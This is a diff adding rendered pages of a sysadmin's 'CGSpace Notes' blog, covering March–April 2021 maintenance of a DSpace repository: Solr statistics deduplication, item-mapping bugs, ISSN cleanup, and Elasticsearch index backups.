+</span></span></code></pre></div><h2 id="2021-03-24">2021-03-24</h2>
+<ul>
+<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=934">ticket about the Duplicate Checker</a>
+<ul>
+<li>He says it works for him in Firefox, so I checked and it seems to have been an issue with my LocalCDN addon</li>
+</ul>
+</li>
+<li>I re-deployed DSpace Test (linode26) from the latest CGSpace (linode18) data
+<ul>
+<li>I want to try to finish up processing the duplicates in Solr that <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">Atmire advised on last month</a></li>
+<li>The current statistics core is 57861236 kilobytes:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># du -s /home/dspacetest.cgiar.org/solr/statistics
+</span></span><span style="display:flex;"><span>57861236        /home/dspacetest.cgiar.org/solr/statistics
+</span></span></code></pre></div><ul>
+<li>I applied their changes to <code>config/spring/api/atmire-cua-update.xml</code> and started the duplicate processor:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">1000</span> -c statistics -t <span style="color:#ae81ff">12</span>
+</span></span></code></pre></div><ul>
+<li>The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)</li>
+<li>Hah, I still got a memory error after only a few minutes:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
+</span></span><span style="display:flex;"><span>Exception: GC overhead limit exceeded                                                                          
+</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: GC overhead limit exceeded 
+</span></span></code></pre></div><ul>
+<li>I guess we really do have to use <code>-r 100</code></li>
+<li>Now the thing runs for a few minutes and &ldquo;finishes&rdquo;:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">100</span> -c statistics -t <span style="color:#ae81ff">12</span>
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>*************************
+</span></span><span style="display:flex;"><span>* Update Script Started *
+</span></span><span style="display:flex;"><span>*************************
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Run 1
+</span></span><span style="display:flex;"><span>Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
+</span></span><span style="display:flex;"><span>Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:17 CET 2021
+</span></span><span style="display:flex;"><span>Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:41 CET 2021
+</span></span><span style="display:flex;"><span>Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:46 CET 2021
+</span></span><span style="display:flex;"><span>Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:54 CET 2021
+</span></span><span style="display:flex;"><span>Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:58 CET 2021
+</span></span><span style="display:flex;"><span>Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
+</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:59 CET 2021
+</span></span><span style="display:flex;"><span>Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
+</span></span><span style="display:flex;"><span>Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
+</span></span><span style="display:flex;"><span>Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
+</span></span><span style="display:flex;"><span>Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
+</span></span><span style="display:flex;"><span>Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
+</span></span><span style="display:flex;"><span>Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
+</span></span><span style="display:flex;"><span>Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
+</span></span><span style="display:flex;"><span>Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
+</span></span><span style="display:flex;"><span>Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
+</span></span><span style="display:flex;"><span>Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
+</span></span><span style="display:flex;"><span>Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
+</span></span><span style="display:flex;"><span>Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
+</span></span><span style="display:flex;"><span>Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
+</span></span><span style="display:flex;"><span>Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
+</span></span><span style="display:flex;"><span>Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
+</span></span><span style="display:flex;"><span>Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
+</span></span><span style="display:flex;"><span>Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
+</span></span><span style="display:flex;"><span>Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
+</span></span><span style="display:flex;"><span>Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
+</span></span><span style="display:flex;"><span>Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
+</span></span><span style="display:flex;"><span>Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
+</span></span><span style="display:flex;"><span>Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
+</span></span><span style="display:flex;"><span>Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
+</span></span><span style="display:flex;"><span>Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
+</span></span><span style="display:flex;"><span>Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
+</span></span><span style="display:flex;"><span>Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
+</span></span><span style="display:flex;"><span>Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
+</span></span><span style="display:flex;"><span>Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
+</span></span><span style="display:flex;"><span>Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
+</span></span><span style="display:flex;"><span>Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
+</span></span><span style="display:flex;"><span>Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
+</span></span><span style="display:flex;"><span>Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
+</span></span><span style="display:flex;"><span>Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
+</span></span><span style="display:flex;"><span>Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
+</span></span><span style="display:flex;"><span>Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
+</span></span><span style="display:flex;"><span>Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
+</span></span><span style="display:flex;"><span>Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
+</span></span><span style="display:flex;"><span>Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
+</span></span><span style="display:flex;"><span>Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
+</span></span><span style="display:flex;"><span>Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
+</span></span><span style="display:flex;"><span>Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
+</span></span><span style="display:flex;"><span>Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
+</span></span><span style="display:flex;"><span>Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
+</span></span><span style="display:flex;"><span>Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
+</span></span><span style="display:flex;"><span>Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
+</span></span><span style="display:flex;"><span>Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
+</span></span><span style="display:flex;"><span>Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
+</span></span><span style="display:flex;"><span>Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
+</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
+</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
+</span></span><span style="display:flex;"><span>Run 1 took 5m 53s
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>**************************
+</span></span><span style="display:flex;"><span>* Update Script Finished *
+</span></span><span style="display:flex;"><span>**************************
+</span></span></code></pre></div><ul>
+<li>If I run it again it finds the same 4,824 docs and processes them&hellip;
+<ul>
+<li>I asked Atmire for feedback on this: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-25">2021-03-25</h2>
+<ul>
+<li>Niroshini from IWMI is still having problems adding metadata during the edit step of the workflow on CGSpace
+<ul>
+<li>I told her to try to register using a private email account and we&rsquo;ll add her to the WLE group so she can try that way</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-28">2021-03-28</h2>
+<ul>
+<li>Make a backup of the <code>openrxv-items-final</code> index on AReS Explorer and start a new harvest</li>
+</ul>
+<h2 id="2021-03-29">2021-03-29</h2>
+<ul>
+<li>The AReS harvesting that I started yesterday finished successfully and all indexes look OK:
+<ul>
+<li><code>openrxv-items</code> is an alias of <code>openrxv-items-final</code> and has a correct number of items</li>
+</ul>
+</li>
+<li>Last week Bosede from IITA said she was trying to move an item from one collection to another and the system was &ldquo;rolling&rdquo; and never finished
+<ul>
+<li>I looked in Munin and I don&rsquo;t see anything particularly wrong that day, so I told her to try again</li>
+</ul>
+</li>
+<li>Marianne Gadeberg asked about mapping an item last week
+<ul>
+<li>Searched for <a href="https://hdl.handle.net/10568/110633">the item</a>&rsquo;s handle, the title, the title in quotes, the UUID, with pluses instead of spaces, etc in the item mapper&hellip; but I can never find it in the results</li>
+<li>I see someone has reported this issue on Jira in DSpace 5.x&rsquo;s XMLUI item mapper: <a href="https://jira.lyrasis.org/browse/DS-2761">https://jira.lyrasis.org/browse/DS-2761</a></li>
+<li>The Solr log shows that my query (with and without quotes, etc) has 143 results:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&amp;wt=javabin&amp;version=2} hits=143 status=0 QTime=0
+</span></span></code></pre></div><ul>
+<li>But the item mapper only displays ten items, with no pagination
+<ul>
+<li>There is no way to search by handle or ID</li>
+<li>I mapped the item manually using a CSV</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-30">2021-03-30</h2>
+<ul>
+<li>I realized I never finished deleting all the old fields after our CG Core migration a few months ago
+<ul>
+<li>I found a few occurrences of old metadata so I had to move them where possible and delete them where not</li>
+</ul>
+</li>
+<li>I updated the <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migration page</a></li>
+<li>Marianne Gadeberg wrote to ask why the item she wanted to map a few days ago still doesn&rsquo;t appear in the mapped collection
+<ul>
+<li>I looked on the item page itself and it lists the collection, but doesn&rsquo;t appear in the collection list</li>
+<li>I tried to forceably reindex the collection and the item, but it didn&rsquo;t seem to work</li>
+<li>Now I will try a complete Discovery re-index</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-31">2021-03-31</h2>
+<ul>
+<li>The Discovery re-index finished, but <a href="https://hdl.handle.net/10568/110633">the CIP item</a> still does not appear in the GENDER Platform grants collection
+<ul>
+<li>The item page itself DOES list the grants collection! WTF</li>
+<li>I sent a message to the dspace-tech mailing list to see if someone can comment</li>
+<li>I even tried unmapping and re-mapping, but it doesn&rsquo;t change anything: the item still doesn&rsquo;t appear in the collection, but I can see that it is mapped</li>
+</ul>
+</li>
+<li>I signed up for a SHERPA API key so I can try to write something to get journal names from ISSN
+<ul>
+<li>This code seems to get a journal title, though I only tried it with a few ISSNs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>query_params <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;item-type&#39;</span>: <span style="color:#e6db74">&#39;publication&#39;</span>, <span style="color:#e6db74">&#39;format&#39;</span>: <span style="color:#e6db74">&#39;Json&#39;</span>, <span style="color:#e6db74">&#39;limit&#39;</span>: <span style="color:#ae81ff">10</span>, <span style="color:#e6db74">&#39;offset&#39;</span>: <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#39;api-key&#39;</span>: <span style="color:#e6db74">&#39;blahhhahahah&#39;</span>, <span style="color:#e6db74">&#39;filter&#39;</span>: <span style="color:#e6db74">&#39;[[&#34;issn&#34;,&#34;equals&#34;,&#34;0011-183X&#34;]]&#39;</span>}
+</span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;https://v2.sherpa.ac.uk/cgi/retrieve&#39;</span>)
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">and</span> len(r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>]) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>:
+</span></span><span style="display:flex;"><span>    r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>]
+</span></span></code></pre></div><ul>
+<li>I exported a list of all our ISSNs from CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
+</span></span><span style="display:flex;"><span>COPY 3081
+</span></span></code></pre></div><ul>
+<li>I wrote a script to check the ISSNs against Crossref&rsquo;s API: <code>crossref-issn-lookup.py</code>
+<ul>
+<li>I suspect Crossref might have better data actually&hellip;</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-04/index.html b/docs/2021-04/index.html
new file mode 100644
index 000000000..2d94a08a0
--- /dev/null
+++ b/docs/2021-04/index.html
@@ -0,0 +1,1096 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2021" />
+<meta property="og:description" content="2021-04-01
+
+I wrote a script to query Sherpa&rsquo;s API for our ISSNs: sherpa-issn-lookup.py
+
+I&rsquo;m curious to see how the results compare with the results from Crossref yesterday
+
+
+AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+
+I simply took everything down with docker-compose and then back up, and then it was OK
+Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-04/" />
+<meta property="article:published_time" content="2021-04-01T09:50:54+03:00" />
+<meta property="article:modified_time" content="2021-04-28T18:57:48+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2021"/>
+<meta name="twitter:description" content="2021-04-01
+
+I wrote a script to query Sherpa&rsquo;s API for our ISSNs: sherpa-issn-lookup.py
+
+I&rsquo;m curious to see how the results compare with the results from Crossref yesterday
+
+
+AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+
+I simply took everything down with docker-compose and then back up, and then it was OK
+Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-04/",
+  "wordCount": "4669",
+  "datePublished": "2021-04-01T09:50:54+03:00",
+  "dateModified": "2021-04-28T18:57:48+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-04/">
+
+    <title>April, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-04/">April, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-04-01T09:50:54+03:00">Thu Apr 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-04-01">2021-04-01</h2>
+<ul>
+<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code>
+<ul>
+<li>I&rsquo;m curious to see how the results compare with the results from Crossref yesterday</li>
+</ul>
+</li>
+<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+<ul>
+<li>I simply took everything down with docker-compose and then back up, and then it was OK</li>
+<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-04-03">2021-04-03</h2>
+<ul>
+<li>Biruk from ICT contacted me to say that some CGSpace users still can&rsquo;t log in
+<ul>
+<li>I guess the CGSpace LDAP bind account is really still locked after last week&rsquo;s reset</li>
+<li>He fixed the account and then I was finally able to bind and query:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-account&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=otheraccounttoquery)&#34;</span>
+</span></span></code></pre></div><h2 id="2021-04-04">2021-04-04</h2>
+<ul>
+<li>Check the index aliases on AReS Explorer to make sure they are sane before starting a new harvest:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
+</span></span></code></pre></div><ul>
+<li>Then set the <code>openrxv-items-final</code> index to read-only so we can make a backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span> 
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final-backup&#34;}%
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then start a harvesting on AReS Explorer</li>
+<li>Help Enrico get some 2020 statistics for the Roots, Tubers and Bananas (RTB) community on CGSpace
+<ul>
+<li>He was hitting <a href="https://github.com/ilri/OpenRXV/issues/66">a bug on AReS</a> and also he only needed stats for 2020, and AReS currently only gives all-time stats</li>
+</ul>
+</li>
+<li>I cleaned up about 230 ISSNs on CGSpace in OpenRefine
+<ul>
+<li>I had exported them last week, then filtered for anything not looking like an ISSN with this GREL: <code>isNotNull(value.match(/^\p{Alnum}{4}-\p{Alnum}{4}$/))</code></li>
+<li>Then I applied them on CGSpace with the <code>fix-metadata-values.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.issn -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">253</span>
+</span></span></code></pre></div><ul>
+<li>For now I only fixed obvious errors like &ldquo;1234-5678.&rdquo; and &ldquo;e-ISSN: 1234-5678&rdquo; etc, but there are still lots of invalid ones which need more manual work:
+<ul>
+<li>Too few characters</li>
+<li>Too many characters</li>
+<li>ISBNs</li>
+</ul>
+</li>
+<li>Create the CGSpace community and collection structure for the new Accelerating Impacts of CGIAR Climate Research for Africa (AICCRA) and assign all workflow steps</li>
+</ul>
+<h2 id="2021-04-05">2021-04-05</h2>
+<ul>
+<li>The AReS Explorer harvesting from yesterday finished, and the results look OK, but actually the Elasticsearch indexes are messed up again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li><code>openrxv-items</code> should be an alias of <code>openrxv-items-final</code>, not <code>openrxv-temp</code>&hellip; I will have to fix that manually</li>
+<li>Enrico asked for more information on the RTB stats I gave him yesterday
+<ul>
+<li>I remembered (again) that we can&rsquo;t filter Atmire&rsquo;s CUA stats by date issued</li>
+<li>To show, for example, views/downloads in the year 2020 for RTB issued in 2020, we would need to use the DSpace statistics API and post a list of IDs and a custom date range</li>
+<li>I tried to do that here by exporting the RTB community and extracting the IDs for items issued in 2020:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]&#39;</span> /tmp/rtb.csv | <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  sed &#39;1d&#39; | \
+</span></span><span style="display:flex;"><span>  csvsql --no-header --no-inference --query &#39;SELECT a AS id,COALESCE(b, &#34;&#34;)||COALESCE(c, &#34;&#34;)||COALESCE(d, &#34;&#34;) AS issued FROM stdin&#39; | \
+</span></span><span style="display:flex;"><span>  csvgrep -c issued -m 2020 | \
+</span></span><span style="display:flex;"><span>  csvcut -c id | \
